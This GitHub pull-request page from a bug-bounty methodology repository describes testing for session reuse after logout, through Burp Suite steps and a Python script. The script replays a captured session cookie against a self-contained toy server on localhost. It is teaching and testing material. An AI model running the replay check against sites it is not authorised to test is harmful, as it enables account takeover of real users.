KathanP19 / HowToHunt

Collection of methodology and test case for various web vulnerabilities.
GNU General Public License v3.0

Updated Session_based_bug.md #230

Closed s3ctat0r closed 1 year ago

s3ctat0r commented 1 year ago

Insufficient account process validation leads to account takeover (P3/P4): [This vulnerability can also be called Security Misconfiguration > Insufficient session validation after logout]

1) Create an account on the website.
2) Go to the profile section. Change and update your details in the name parameter and, before saving, open Burp Suite, turn the proxy on and then click on Save.
3) Now capture the request in Burp Suite and send it to the Repeater tab.
4) Now log out from the website and go back to Burp Suite.
5) Now change the details in the email & name parameters and click on "Go" in the Repeater tab.
6) Now you will be able to see a 200 OK response from the web server.
7) Now log in to your account and go to the Profile section to confirm.
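The seven steps above, automated end to end as an added example (this is not code from the HowToHunt repository or from the PR author). It spins up a throwaway in-process HTTP app with hypothetical `/login`, `/profile` and `/logout` endpoints and a constructed user `alice` / `password123`, then performs the same sequence Burp Repeater would: log in, capture the session cookie, make a legitimate profile update, log out, and replay the profile update with the captured cookie. The app's `invalidate_on_logout` switch is the assumed root cause: when logout only clears the browser cookie and leaves the server-side session alive, the replay still returns 200 and the profile changes; when logout also deletes the server-side session, the replay gets 401. Point `check_logout_replay` at a real target only with the endpoint paths and JSON body adapted to that application.

```python
"""Logout-replay check: does a session captured before logout still work after it?"""
import json
import secrets
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class ToyApp:
    """Minimal in-memory app (constructed for this example). The flag toggles the fix."""

    def __init__(self, invalidate_on_logout):
        self.invalidate_on_logout = invalidate_on_logout
        self.sessions = {}  # session id -> username (server-side session store)
        self.user = ("alice", "password123")  # constructed credentials
        self.profile = {"name": "alice", "email": "alice@example.test"}


def make_handler(app):
    class Handler(BaseHTTPRequestHandler):
        def log_message(self, *args):  # keep the demo quiet
            pass

        def _sid(self):
            for part in self.headers.get("Cookie", "").split(";"):
                key, _, value = part.strip().partition("=")
                if key == "sid":
                    return value
            return None

        def _json(self, code, obj, extra_headers=()):
            body = json.dumps(obj).encode()
            self.send_response(code)
            self.send_header("Content-Type", "application/json")
            for key, value in extra_headers:
                self.send_header(key, value)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def _body(self):
            length = int(self.headers.get("Content-Length", 0))
            return json.loads(self.rfile.read(length) or b"{}")

        def do_POST(self):
            if self.path == "/login":
                data = self._body()
                if (data.get("user"), data.get("pass")) != app.user:
                    return self._json(401, {"error": "bad credentials"})
                sid = secrets.token_hex(16)
                app.sessions[sid] = data["user"]
                return self._json(200, {"ok": True}, [("Set-Cookie", f"sid={sid}; HttpOnly")])
            sid = self._sid()
            if sid not in app.sessions:
                return self._json(401, {"error": "not logged in"})
            if self.path == "/logout":
                if app.invalidate_on_logout:
                    app.sessions.pop(sid, None)  # the fix: kill the server-side session
                # vulnerable variant only tells the browser to drop the cookie
                return self._json(200, {"ok": True}, [("Set-Cookie", "sid=; Max-Age=0")])
            if self.path == "/profile":
                data = self._body()
                app.profile.update({k: data[k] for k in ("name", "email") if k in data})
                return self._json(200, app.profile)
            return self._json(404, {"error": "no such route"})

    return Handler


def _post(base, path, data, sid=None):
    """POST JSON, optionally replaying a captured sid cookie; never raises on 4xx."""
    req = urllib.request.Request(base + path, data=json.dumps(data).encode(),
                                 headers={"Content-Type": "application/json"}, method="POST")
    if sid:
        req.add_header("Cookie", f"sid={sid}")
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, resp.headers, json.loads(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, err.headers, json.loads(err.read() or b"{}")


def check_logout_replay(base, user, password):
    """Steps 1-7 of the PR: returns True if the post-logout replay still succeeds."""
    code, headers, _ = _post(base, "/login", {"user": user, "pass": password})  # step 1
    assert code == 200, "login failed"
    sid = headers["Set-Cookie"].split(";")[0].split("=", 1)[1]  # captured session cookie
    code, _, _ = _post(base, "/profile", {"name": "alice-updated"}, sid)  # steps 2-3
    assert code == 200, "baseline profile update failed"
    _post(base, "/logout", {}, sid)  # step 4
    code, _, body = _post(base, "/profile",  # steps 5-6: replay with new values
                          {"name": "pwned", "email": "attacker@example.test"}, sid)
    return code == 200 and body.get("name") == "pwned"  # step 7: change persisted?


def run_demo(invalidate_on_logout):
    """Start the toy app on a free port, run the check, return the verdict."""
    app = ToyApp(invalidate_on_logout)
    server = ThreadingHTTPServer(("127.0.0.1", 0), make_handler(app))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_logout_replay(f"http://127.0.0.1:{server.server_port}",
                                   "alice", "password123")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("vulnerable app, replay succeeded:", run_demo(invalidate_on_logout=False))
    print("fixed app, replay succeeded:     ", run_demo(invalidate_on_logout=True))
```

The deciding signal is the last step, not the 200 status alone: some applications answer 200 to an unauthenticated POST and silently discard it, so confirm the replayed values actually landed on the profile after logging back in.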
KathanP19 commented 1 year ago

Hey @s3ctat0r, thanks for adding some new methods and resources. @all-contributors please add @s3ctat0r for tutorial

allcontributors[bot] commented 1 year ago

@KathanP19

I've put up a pull request to add @s3ctat0r! :tada: